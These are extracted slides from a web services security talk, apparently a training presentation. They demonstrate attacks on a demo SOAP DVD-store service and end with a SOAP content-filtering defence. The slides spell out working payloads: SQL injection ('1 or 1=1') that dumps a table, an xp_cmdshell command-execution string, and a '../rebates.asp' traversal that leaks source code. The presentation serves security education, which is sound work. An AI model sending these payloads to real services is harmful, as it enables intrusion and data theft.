  • 82. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfo xmlns=&quot;http://tempuri.org/&quot;> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method Demo Forcing Fault Code Source of Enumeration
  • 83. SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot; c:netpubwwrootebatesbx.xyz&amp;quot ;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Path Enumeration Fault Code
  • 84.
  • 85. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfo xmlns=&quot;http://tempuri.org/&quot;> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method
  • 86. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Product Information
  • 87. SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names . Use a single space if necessary.</faultstring> <detail /> </soap:Fault> </soap:Body> Demo Indicates SQL Server Place for SQL Injection Fault Code
  • 88. SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfo xmlns=&quot;http://tempuri.org/&quot;> <id>1 or 1=1</id> </getProductInfo> </soap:Body> </soap:Envelope> Popular SQL Injection Fault Code
  • 89. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getProductInfoResult> /(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> Works!! Entire Table Is out
  • 90. SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfo xmlns=&quot;http://tempuri.org/&quot;> <id>1;EXEC master..xp_cmdshell 'dir c:> c:netpubwwrootsdir.txt'</id> </getProductInfo> </soap:Body> </soap:Envelope> Exploiting this Vulnerability Exploit code
  • 91. SOAP request <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Works!! Looks Normal response
  • 92. SOAP request But … Code got executed Looks Normal response Got Admin via cmdshell
  • 93.
  • 94.
  • 95.
  • 96.
  • 97.
  • 98.
  • 99. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfo xmlns=&quot;http://tempuri.org/&quot;> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method Forcing Fault Code Source of Enumeration
  • 100. SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot; c:netpubwwrootebatesbx.xyz&amp;quot ;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Path Enumeration Fault Code
  • 101. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfo xmlns=&quot;http://tempuri.org/&quot;> <fileinfo>../rebates.asp</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method Forcing file
  • 102. SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getRebatesInfoResult >&lt;% ' file: rebates.asp ' date: 20-AUG-03 ' desc: rebates listing ' author: nd ' client: dvds4less 'check if we have been called with a filename or without loc = request.querystring(&quot;loc&quot;) lenloc = len(loc) if lenloc &gt; 0 then ' we have been called with a filename ' so print the rebate coupon%&gt;&lt;img …………………… . </getRebatesInfoResult> </getRebatesInfoResponse> </soap:Body> </soap:Envelope> Parameter Temparing File Access to system
  • 103.
  • 104.
  • 105.
  • 106.
  • 107.
  • 108.
  • 109.
  • 110. IIS Web Server HTTP Stack .Net Web Services IIS Web Server wsRook (Filter) Web Services Client SOAP Envelope Reject Rules for SOAP Content filtering
  • 111. .Net Web Services .asmx file IIS web server wsRook Web Services Client SOAP Input Envelope <soap:Body soap:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;> <q1:getInput xmlns:q1=&quot;http://DefaultNamespace&quot;> <id xsi:type=&quot;xsd:string&quot;>12123</id> </q1:getInput> </soap:Body> DB <id xsi:type=&quot;xsd:string&quot;>12123</id> id=12123 Bal=$2500 <ns1:getInputReturn xsi:type=&quot;xsd:string&quot;> $2500 </ns1:getInputReturn> SOAP Output Envelope Content filtering
  • 112.
  • 113.
  • 114.
  • 115.
  • 116. Thanks! Email - shreeraj@net-square.com Blog - http://shreeraj.blogspot.com